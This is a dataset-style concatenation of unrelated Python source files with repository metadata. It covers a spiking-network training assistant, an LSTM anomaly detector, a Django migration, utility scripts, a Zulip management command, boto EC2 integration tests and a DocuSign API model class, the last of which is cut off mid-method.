| [((23, 13, 23, 57), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({(23, 37, 23, 56): '"""Data Augmentation"""'}, {}), "('Data Augmentation')", False, 'import argparse\n'), ((31, 12, 31, 58), 'keras.models.load_model', 'keras.models.load_model', ({(31, 36, 31, 57): 'args.keras_model_path'}, {}), '(args.keras_model_path)', False, 'import keras\n'), ((35, 17, 35, 60), 'keras2onnx.convert_keras', 'keras2onnx.convert_keras', ({(35, 42, 35, 47): 'model', (35, 49, 35, 59): 'model.name'}, {}), '(model, model.name)', False, 'import keras2onnx\n')] |
timcheck/lava-dl | src/lava/lib/dl/slayer/utils/assistant.py | e680722071129fde952ea0d744984aa2a038797a | # Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
"""Assistant utility for automatically load network from network
description."""
import torch
class Assistant:
"""Assistant that bundles training, validation and testing workflow.
Parameters
----------
net : torch.nn.Module
network to train.
error : object or lambda
an error object or a lambda function that evaluates error.
It is expected to take ``(output, target)`` | ``(output, label)``
as it's argument and return a scalar value.
optimizer : torch optimizer
the learning optimizer.
stats : slayer.utils.stats
learning stats logger. If None, stats will not be logged.
Defaults to None.
classifier : slayer.classifier or lambda
classifier object or lambda function that takes output and
returns the network prediction. None means regression mode.
Classification steps are bypassed.
Defaults to None.
count_log : bool
flag to enable count log. Defaults to False.
lam : float
lagrangian to merge network layer based loss.
None means no such additional loss.
If not None, net is expected to return the accumulated loss as second
argument. It is intended to be used with layer wise sparsity loss.
Defaults to None.
Attributes
----------
net
error
optimizer
stats
classifier
count_log
lam
device : torch.device or None
the main device memory where network is placed. It is not at start and
gets initialized on the first call.
"""
def __init__(
self,
net, error, optimizer,
stats=None, classifier=None, count_log=False,
lam=None
):
self.net = net
self.error = error
self.optimizer = optimizer
self.classifier = classifier
self.stats = stats
self.count_log = count_log
self.lam = lam
self.device = None
def reduce_lr(self, factor=10 / 3):
"""Reduces the learning rate of the optimizer by ``factor``.
Parameters
----------
factor : float
learning rate reduction factor. Defaults to 10/3.
Returns
-------
"""
for param_group in self.optimizer.param_groups:
print('\nLearning rate reduction from', param_group['lr'])
param_group['lr'] /= factor
def train(self, input, target):
"""Training assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
spike count if ``count_log`` is enabled
"""
self.net.train()
if self.device is None:
for p in self.net.parameters():
self.device = p.device
break
device = self.device
input = input.to(device)
target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, net_loss, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, net_loss = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.training.num_samples += input.shape[0]
self.stats.training.loss_sum += loss.cpu().data.item() \
* output.shape[0]
if self.classifier is not None: # classification
self.stats.training.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if self.lam is not None: # add net_loss before backward step
loss += self.lam * net_loss
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if count is None:
return output
return output, count
def test(self, input, target):
"""Testing assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
spike count if ``count_log`` is enabled
"""
self.net.eval()
if self.device is None:
for p in self.net.parameters():
self.device = p.device
break
device = self.device
with torch.no_grad():
input = input.to(device)
target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, _, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, _ = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.testing.num_samples += input.shape[0]
self.stats.testing.loss_sum += loss.cpu().data.item() \
* output.shape[0]
if self.classifier is not None: # classification
self.stats.testing.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if count is None:
return output
return output, count
def valid(self, input, target):
"""Validation assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
spike count if ``count_log`` is enabled
"""
self.net.eval()
with torch.no_grad():
device = self.net.device
input = input.to(device)
target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, _, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, _ = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.validation.num_samples += input.shape[0]
if self.lam is None:
self.stats.validation.loss_sum += loss.cpu().data.item() \
* output.shape[0]
else:
self.stats.validation.loss_sum += loss.cpu().data.item() \
* output.shape[0]
if self.classifier is not None: # classification
self.stats.validation.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if count is None:
return output
return output, count
| [((173, 13, 173, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((225, 13, 225, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n')] |
cse-icon-dataAnalytics/lstm-anomaly-detect | lstm-synthetic-wave-anomaly-detect.py | bcfb01db383698acbd5692f1a76a5f20ec3629a8 | """ Inspired by example from
https://github.com/Vict0rSch/deep_learning/tree/master/keras/recurrent
Uses the TensorFlow backend
The basic idea is to detect anomalies in a time-series.
"""
import matplotlib.pyplot as plt
import numpy as np
import time
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from numpy import arange, sin, pi, random
np.random.seed(1234)
# Global hyper-parameters
sequence_length = 100
random_data_dup = 10 # each sample randomly duplicated between 0 and 9 times, see dropin function
epochs = 1
batch_size = 50
def dropin(X, y):
""" The name suggests the inverse of dropout, i.e. adding more samples. See Data Augmentation section at
http://simaaron.github.io/Estimating-rainfall-from-weather-radar-readings-using-recurrent-neural-networks/
:param X: Each row is a training sequence
:param y: Tne target we train and will later predict
:return: new augmented X, y
"""
print("X shape:", X.shape)
print("y shape:", y.shape)
X_hat = []
y_hat = []
for i in range(0, len(X)):
for j in range(0, np.random.random_integers(0, random_data_dup)):
X_hat.append(X[i, :])
y_hat.append(y[i])
return np.asarray(X_hat), np.asarray(y_hat)
def gen_wave():
""" Generate a synthetic wave by adding up a few sine waves and some noise
:return: the final wave
"""
t = np.arange(0.0, 10.0, 0.01)
wave1 = sin(2 * 2 * pi * t)
noise = random.normal(0, 0.1, len(t))
wave1 = wave1 + noise
print("wave1", len(wave1))
wave2 = sin(2 * pi * t)
print("wave2", len(wave2))
t_rider = arange(0.0, 0.5, 0.01)
wave3 = sin(10 * pi * t_rider)
print("wave3", len(wave3))
insert = round(0.8 * len(t))
wave1[insert:insert + 50] = wave1[insert:insert + 50] + wave3
return wave1 + wave2
def z_norm(result):
result_mean = result.mean()
result_std = result.std()
result -= result_mean
result /= result_std
return result, result_mean
def get_split_prep_data(train_start, train_end,
test_start, test_end):
data = gen_wave()
print("Length of Data", len(data))
# train data
print "Creating train data..."
result = []
for index in range(train_start, train_end - sequence_length):
result.append(data[index: index + sequence_length])
result = np.array(result) # shape (samples, sequence_length)
result, result_mean = z_norm(result)
print "Mean of train data : ", result_mean
print "Train data shape : ", result.shape
train = result[train_start:train_end, :]
np.random.shuffle(train) # shuffles in-place
X_train = train[:, :-1]
y_train = train[:, -1]
X_train, y_train = dropin(X_train, y_train)
# test data
print "Creating test data..."
result = []
for index in range(test_start, test_end - sequence_length):
result.append(data[index: index + sequence_length])
result = np.array(result) # shape (samples, sequence_length)
result, result_mean = z_norm(result)
print "Mean of test data : ", result_mean
print "Test data shape : ", result.shape
X_test = result[:, :-1]
y_test = result[:, -1]
print("Shape X_train", np.shape(X_train))
print("Shape X_test", np.shape(X_test))
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
return X_train, y_train, X_test, y_test
def build_model():
model = Sequential()
layers = {'input': 1, 'hidden1': 64, 'hidden2': 256, 'hidden3': 100, 'output': 1}
model.add(LSTM(
input_length=sequence_length - 1,
input_dim=layers['input'],
output_dim=layers['hidden1'],
return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(
layers['hidden2'],
return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(
layers['hidden3'],
return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(
output_dim=layers['output']))
model.add(Activation("linear"))
start = time.time()
model.compile(loss="mse", optimizer="rmsprop")
print "Compilation Time : ", time.time() - start
return model
def run_network(model=None, data=None):
global_start_time = time.time()
if data is None:
print 'Loading data... '
# train on first 700 samples and test on next 300 samples (has anomaly)
X_train, y_train, X_test, y_test = get_split_prep_data(0, 700, 500, 1000)
else:
X_train, y_train, X_test, y_test = data
print '\nData Loaded. Compiling...\n'
if model is None:
model = build_model()
try:
print("Training...")
model.fit(
X_train, y_train,
batch_size=batch_size, nb_epoch=epochs, validation_split=0.05)
print("Predicting...")
predicted = model.predict(X_test)
print("Reshaping predicted")
predicted = np.reshape(predicted, (predicted.size,))
except KeyboardInterrupt:
print("prediction exception")
print 'Training duration (s) : ', time.time() - global_start_time
return model, y_test, 0
try:
plt.figure(1)
plt.subplot(311)
plt.title("Actual Test Signal w/Anomalies")
plt.plot(y_test[:len(y_test)], 'b')
plt.subplot(312)
plt.title("Predicted Signal")
plt.plot(predicted[:len(y_test)], 'g')
plt.subplot(313)
plt.title("Squared Error")
mse = ((y_test - predicted) ** 2)
plt.plot(mse, 'r')
plt.show()
except Exception as e:
print("plotting exception")
print str(e)
print 'Training duration (s) : ', time.time() - global_start_time
return model, y_test, predicted
run_network()
| [] |
btenaglia/hpc-historias-clinicas | hpc-historias-clinicas/historias/migrations/0007_auto_20150425_1459.py | 649d8660381381b1c591667760c122d73071d5ec | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('historias', '0006_auto_20150413_0001'),
]
operations = [
migrations.AlterField(
model_name='historias',
name='fecha_ingreso',
field=models.DateField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468359), help_text='Formato: dd/mm/yyyy', verbose_name='Fecha de Ingreso'),
preserve_default=True,
),
migrations.AlterField(
model_name='historias',
name='hora_ingreso',
field=models.TimeField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468307), help_text='Formato: hh:mm', verbose_name='Hora de Ingreso'),
preserve_default=True,
),
migrations.AlterField(
model_name='ubicaciones',
name='sala',
field=models.CharField(max_length=10, choices=[(b'SALA 1', b'SALA 1'), (b'SALA 2', b'SALA 2'), (b'SALA 3', b'SALA 3'), (b'SALA 4', b'SALA 4'), (b'SALA 5', b'SALA 5'), (b'GAURDIA', b'GAURDIA'), (b'NEO', b'NEO'), (b'UTI', b'UTI'), (b'UCO', b'UCO'), (b'PRE PARTO', b'PRE PARTO')]),
preserve_default=True,
),
]
| [((30, 18, 30, 289), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models, migrations\n'), ((18, 43, 18, 93), 'datetime.datetime', 'datetime.datetime', ({(18, 61, 18, 65): '(2015)', (18, 67, 18, 68): '(4)', (18, 70, 18, 72): '(25)', (18, 74, 18, 76): '(14)', (18, 78, 18, 80): '(59)', (18, 82, 18, 84): '(14)', (18, 86, 18, 92): '(468359)'}, {}), '(2015, 4, 25, 14, 59, 14, 468359)', False, 'import datetime\n'), ((24, 43, 24, 93), 'datetime.datetime', 'datetime.datetime', ({(24, 61, 24, 65): '(2015)', (24, 67, 24, 68): '(4)', (24, 70, 24, 72): '(25)', (24, 74, 24, 76): '(14)', (24, 78, 24, 80): '(59)', (24, 82, 24, 84): '(14)', (24, 86, 24, 92): '(468307)'}, {}), '(2015, 4, 25, 14, 59, 14, 468307)', False, 'import datetime\n')] |
Verckolf/MyInterfaceTest | venv/Lib/site-packages/har2case/__about__.py | e05674bd673a6a43cfb33f7cb4318886ba92a05c | __title__ = 'har2case'
__description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.'
__url__ = 'https://github.com/HttpRunner/har2case'
__version__ = '0.2.0'
__author__ = 'debugtalk'
__author_email__ = '[email protected]'
__license__ = 'Apache-2.0'
__copyright__ = 'Copyright 2017 debugtalk' | [] |
woctezuma/match-steam-banners | app_id_utils.py | dff1bc2ddf35a37bcdea46a220f5d0257d47e017 | import os
from pathlib import Path
from data_utils import get_data_path, get_image_data_path, get_image_extension
def app_id_to_image_filename(app_id, is_horizontal_banner=False):
image_data_path = get_image_data_path(is_horizontal_banner)
image_filename = image_data_path + str(app_id) + get_image_extension()
return image_filename
def image_filename_to_app_id(image_filename):
base_name = os.path.basename(image_filename)
app_id = base_name.strip(get_image_extension())
return app_id
def list_app_ids(is_horizontal_banner=False):
image_data_path = get_image_data_path(is_horizontal_banner)
image_filenames = Path(image_data_path).glob("*" + get_image_extension())
app_ids = [image_filename_to_app_id(filename) for filename in image_filenames]
app_ids = sorted(app_ids, key=int)
return app_ids
def get_frozen_app_ids_filename():
frozen_app_ids_filename = get_data_path() + "frozen_app_ids.txt"
return frozen_app_ids_filename
def freeze_app_ids(app_ids, output_file_name=None):
if output_file_name is None:
output_file_name = get_frozen_app_ids_filename()
with open(output_file_name, "w", encoding="utf8") as f:
for app_id in app_ids:
f.write("{}\n".format(app_id))
return
def load_frozen_app_ids(input_file_name=None):
if input_file_name is None:
input_file_name = get_frozen_app_ids_filename()
with open(input_file_name, "r", encoding="utf8") as f:
# Do not convert to a set object, or any other conversion, because we want to keep the list order as it is.
# Just read the list from the file. That is all there is to do. Otherwise, appIDs will be scrambled!
frozen_app_ids = [app_id.strip() for app_id in f.readlines()]
return frozen_app_ids
def get_frozen_app_ids(is_horizontal_banner=False):
try:
frozen_app_ids = load_frozen_app_ids()
except FileNotFoundError:
print("Creating {}".format(get_frozen_app_ids_filename()))
frozen_app_ids = list_app_ids(is_horizontal_banner=is_horizontal_banner)
freeze_app_ids(frozen_app_ids)
return frozen_app_ids
| [((8, 22, 8, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(8, 42, 8, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((16, 16, 16, 48), 'os.path.basename', 'os.path.basename', ({(16, 33, 16, 47): 'image_filename'}, {}), '(image_filename)', False, 'import os\n'), ((24, 22, 24, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(24, 42, 24, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((10, 53, 10, 74), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((18, 29, 18, 50), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((36, 30, 36, 45), 'data_utils.get_data_path', 'get_data_path', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((26, 22, 26, 43), 'pathlib.Path', 'Path', ({(26, 27, 26, 42): 'image_data_path'}, {}), '(image_data_path)', False, 'from pathlib import Path\n'), ((26, 55, 26, 76), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n')] |
sjm446/aMAZEd | upload.py | 38789f9898097991b19e686fd76ef4abd5bfe94c | #!/usr/bin/env python
import boto3
import random
import os
BUCKET=os.environ.get('EXPORT_S3_BUCKET_URL')
if (BUCKET != None):
s3 = boto3.client('s3')
with open("maze.txt", "rb") as f:
s3.upload_fileobj(f, BUCKET, "maze"+str(random.randrange(100000))+".txt")
else:
print("EXPORT_S3_BUCKET_URL was not set so not uploading file")
| [((5, 7, 5, 45), 'os.environ.get', 'os.environ.get', ({(5, 22, 5, 44): '"""EXPORT_S3_BUCKET_URL"""'}, {}), "('EXPORT_S3_BUCKET_URL')", False, 'import os\n'), ((7, 9, 7, 27), 'boto3.client', 'boto3.client', ({(7, 22, 7, 26): '"""s3"""'}, {}), "('s3')", False, 'import boto3\n'), ((9, 48, 9, 72), 'random.randrange', 'random.randrange', ({(9, 65, 9, 71): '(100000)'}, {}), '(100000)', False, 'import random\n')] |
rtzll/zulip | zerver/management/commands/list_realms.py | b831df8f7fc2f5b89ec998266901ac491d52a7fc |
import sys
from typing import Any
from argparse import ArgumentParser
from zerver.models import Realm
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """List realms in the server and it's configuration settings(optional).
Usage examples:
./manage.py list_realms
./manage.py list_realms --all"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--all",
dest="all",
action="store_true",
default=False,
help="Print all the configuration settings of the realms.")
def handle(self, *args: Any, **options: Any) -> None:
realms = Realm.objects.all()
outer_format = "%-5s %-40s %-40s"
inner_format = "%-40s %s"
deactivated = False
if not options["all"]:
print(outer_format % ("id", "string_id", "name"))
print(outer_format % ("--", "---------", "----"))
for realm in realms:
if realm.deactivated:
print(self.style.ERROR(outer_format % (realm.id, realm.string_id, realm.name)))
deactivated = True
else:
print(outer_format % (realm.id, realm.string_id, realm.name))
if deactivated:
print(self.style.WARNING("\nRed rows represent deactivated realms."))
sys.exit(0)
# The remaining code path is the --all case.
identifier_attributes = ["id", "name", "string_id"]
for realm in realms:
# Start with just all the fields on the object, which is
# hacky but doesn't require any work to maintain.
realm_dict = realm.__dict__
# Remove a field that is confusingly useless
del realm_dict['_state']
# Fix the one bitfield to display useful data
realm_dict['authentication_methods'] = str(realm.authentication_methods_dict())
for key in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, realm_dict[key])))
deactivated = True
else:
print(inner_format % (key, realm_dict[key]))
for key, value in sorted(realm_dict.iteritems()):
if key not in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, value)))
else:
print(inner_format % (key, value))
print("-" * 80)
if deactivated:
print(self.style.WARNING("\nRed is used to highlight deactivated realms."))
| [((26, 17, 26, 36), 'zerver.models.Realm.objects.all', 'Realm.objects.all', ({}, {}), '()', False, 'from zerver.models import Realm\n'), ((44, 12, 44, 23), 'sys.exit', 'sys.exit', ({(44, 21, 44, 22): '(0)'}, {}), '(0)', False, 'import sys\n')] |
bopopescu/debpkg_python-boto | tests/integration/ec2/test_connection.py | 06f9b6f3693ba1933be8214da69cebcd5212cd97 | # Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2009, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the EC2Connection
"""
import unittest
import time
import telnetlib
import socket
from nose.plugins.attrib import attr
from boto.ec2.connection import EC2Connection
from boto.exception import EC2ResponseError
class EC2ConnectionTest(unittest.TestCase):
ec2 = True
@attr('notdefault')
def test_launch_permissions(self):
# this is my user_id, if you want to run these tests you should
# replace this with yours or they won't work
user_id = '963068290131'
print '--- running EC2Connection tests ---'
c = EC2Connection()
# get list of private AMI's
rs = c.get_all_images(owners=[user_id])
assert len(rs) > 0
# now pick the first one
image = rs[0]
# temporarily make this image runnable by everyone
status = image.set_launch_permissions(group_names=['all'])
assert status
d = image.get_launch_permissions()
assert 'groups' in d
assert len(d['groups']) > 0
# now remove that permission
status = image.remove_launch_permissions(group_names=['all'])
assert status
time.sleep(10)
d = image.get_launch_permissions()
assert 'groups' not in d
def test_1_basic(self):
# create 2 new security groups
c = EC2Connection()
group1_name = 'test-%d' % int(time.time())
group_desc = 'This is a security group created during unit testing'
group1 = c.create_security_group(group1_name, group_desc)
time.sleep(2)
group2_name = 'test-%d' % int(time.time())
group_desc = 'This is a security group created during unit testing'
group2 = c.create_security_group(group2_name, group_desc)
# now get a listing of all security groups and look for our new one
rs = c.get_all_security_groups()
found = False
for g in rs:
if g.name == group1_name:
found = True
assert found
# now pass arg to filter results to only our new group
rs = c.get_all_security_groups([group1_name])
assert len(rs) == 1
# try some group to group authorizations/revocations
# first try the old style
status = c.authorize_security_group(group1.name,
group2.name,
group2.owner_id)
assert status
status = c.revoke_security_group(group1.name,
group2.name,
group2.owner_id)
assert status
# now try specifying a specific port
status = c.authorize_security_group(group1.name,
group2.name,
group2.owner_id,
'tcp', 22, 22)
assert status
status = c.revoke_security_group(group1.name,
group2.name,
group2.owner_id,
'tcp', 22, 22)
assert status
# now delete the second security group
status = c.delete_security_group(group2_name)
# now make sure it's really gone
rs = c.get_all_security_groups()
found = False
for g in rs:
if g.name == group2_name:
found = True
assert not found
group = group1
# now try to launch apache image with our new security group
rs = c.get_all_images()
img_loc = 'ec2-public-images/fedora-core4-apache.manifest.xml'
for image in rs:
if image.location == img_loc:
break
reservation = image.run(security_groups=[group.name])
instance = reservation.instances[0]
while instance.state != 'running':
print '\tinstance is %s' % instance.state
time.sleep(30)
instance.update()
# instance in now running, try to telnet to port 80
t = telnetlib.Telnet()
try:
t.open(instance.dns_name, 80)
except socket.error:
pass
# now open up port 80 and try again, it should work
group.authorize('tcp', 80, 80, '0.0.0.0/0')
t.open(instance.dns_name, 80)
t.close()
# now revoke authorization and try again
group.revoke('tcp', 80, 80, '0.0.0.0/0')
try:
t.open(instance.dns_name, 80)
except socket.error:
pass
# now kill the instance and delete the security group
instance.terminate()
# check that state and previous_state have updated
assert instance.state == 'shutting-down'
assert instance.state_code == 32
assert instance.previous_state == 'running'
assert instance.previous_state_code == 16
# unfortunately, I can't delete the sg within this script
#sg.delete()
# create a new key pair
key_name = 'test-%d' % int(time.time())
status = c.create_key_pair(key_name)
assert status
# now get a listing of all key pairs and look for our new one
rs = c.get_all_key_pairs()
found = False
for k in rs:
if k.name == key_name:
found = True
assert found
# now pass arg to filter results to only our new key pair
rs = c.get_all_key_pairs([key_name])
assert len(rs) == 1
key_pair = rs[0]
# now delete the key pair
status = c.delete_key_pair(key_name)
# now make sure it's really gone
rs = c.get_all_key_pairs()
found = False
for k in rs:
if k.name == key_name:
found = True
assert not found
# short test around Paid AMI capability
demo_paid_ami_id = 'ami-bd9d78d4'
demo_paid_ami_product_code = 'A79EC0DB'
l = c.get_all_images([demo_paid_ami_id])
assert len(l) == 1
assert len(l[0].product_codes) == 1
assert l[0].product_codes[0] == demo_paid_ami_product_code
print '--- tests completed ---'
def test_dry_run(self):
c = EC2Connection()
dry_run_msg = 'Request would have succeeded, but DryRun flag is set.'
try:
rs = c.get_all_images(dry_run=True)
self.fail("Should have gotten an exception")
except EC2ResponseError, e:
self.assertTrue(dry_run_msg in str(e))
try:
rs = c.run_instances(
image_id='ami-a0cd60c9',
instance_type='m1.small',
dry_run=True
)
self.fail("Should have gotten an exception")
except EC2ResponseError, e:
self.assertTrue(dry_run_msg in str(e))
# Need an actual instance for the rest of this...
rs = c.run_instances(
image_id='ami-a0cd60c9',
instance_type='m1.small'
)
time.sleep(120)
try:
rs = c.stop_instances(
instance_ids=[rs.instances[0].id],
dry_run=True
)
self.fail("Should have gotten an exception")
except EC2ResponseError, e:
self.assertTrue(dry_run_msg in str(e))
try:
rs = c.terminate_instances(
instance_ids=[rs.instances[0].id],
dry_run=True
)
self.fail("Should have gotten an exception")
except EC2ResponseError, e:
self.assertTrue(dry_run_msg in str(e))
# And kill it.
rs.instances[0].terminate()
| [] |
joekohlsdorf/docusign-esign-python-client | docusign_esign/models/conditional_recipient_rule_filter.py | 40407544f79c88716d36fabf36f65c3ef1a5c3ba | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ConditionalRecipientRuleFilter(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'operator': 'str',
'recipient_id': 'str',
'scope': 'str',
'tab_id': 'str',
'tab_label': 'str',
'tab_type': 'str',
'value': 'str'
}
attribute_map = {
'operator': 'operator',
'recipient_id': 'recipientId',
'scope': 'scope',
'tab_id': 'tabId',
'tab_label': 'tabLabel',
'tab_type': 'tabType',
'value': 'value'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ConditionalRecipientRuleFilter - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._operator = None
self._recipient_id = None
self._scope = None
self._tab_id = None
self._tab_label = None
self._tab_type = None
self._value = None
self.discriminator = None
setattr(self, "_{}".format('operator'), kwargs.get('operator', None))
setattr(self, "_{}".format('recipient_id'), kwargs.get('recipient_id', None))
setattr(self, "_{}".format('scope'), kwargs.get('scope', None))
setattr(self, "_{}".format('tab_id'), kwargs.get('tab_id', None))
setattr(self, "_{}".format('tab_label'), kwargs.get('tab_label', None))
setattr(self, "_{}".format('tab_type'), kwargs.get('tab_type', None))
setattr(self, "_{}".format('value'), kwargs.get('value', None))
@property
def operator(self):
"""Gets the operator of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The operator of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._operator
@operator.setter
def operator(self, operator):
"""Sets the operator of this ConditionalRecipientRuleFilter.
# noqa: E501
:param operator: The operator of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._operator = operator
@property
def recipient_id(self):
"""Gets the recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501
:return: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._recipient_id
@recipient_id.setter
def recipient_id(self, recipient_id):
"""Sets the recipient_id of this ConditionalRecipientRuleFilter.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501
:param recipient_id: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._recipient_id = recipient_id
@property
def scope(self):
"""Gets the scope of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The scope of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._scope
@scope.setter
def scope(self, scope):
"""Sets the scope of this ConditionalRecipientRuleFilter.
# noqa: E501
:param scope: The scope of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._scope = scope
@property
def tab_id(self):
"""Gets the tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501
:return: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_id
@tab_id.setter
def tab_id(self, tab_id):
"""Sets the tab_id of this ConditionalRecipientRuleFilter.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501
:param tab_id: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_id = tab_id
@property
def tab_label(self):
"""Gets the tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
The label string associated with the tab. # noqa: E501
:return: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_label
@tab_label.setter
def tab_label(self, tab_label):
"""Sets the tab_label of this ConditionalRecipientRuleFilter.
The label string associated with the tab. # noqa: E501
:param tab_label: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_label = tab_label
@property
def tab_type(self):
"""Gets the tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_type
@tab_type.setter
def tab_type(self, tab_type):
"""Sets the tab_type of this ConditionalRecipientRuleFilter.
# noqa: E501
:param tab_type: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_type = tab_type
@property
def value(self):
"""Gets the value of this ConditionalRecipientRuleFilter. # noqa: E501
Specifies the value of the tab. # noqa: E501
:return: The value of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ConditionalRecipientRuleFilter.
Specifies the value of the tab. # noqa: E501
:param value: The value of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
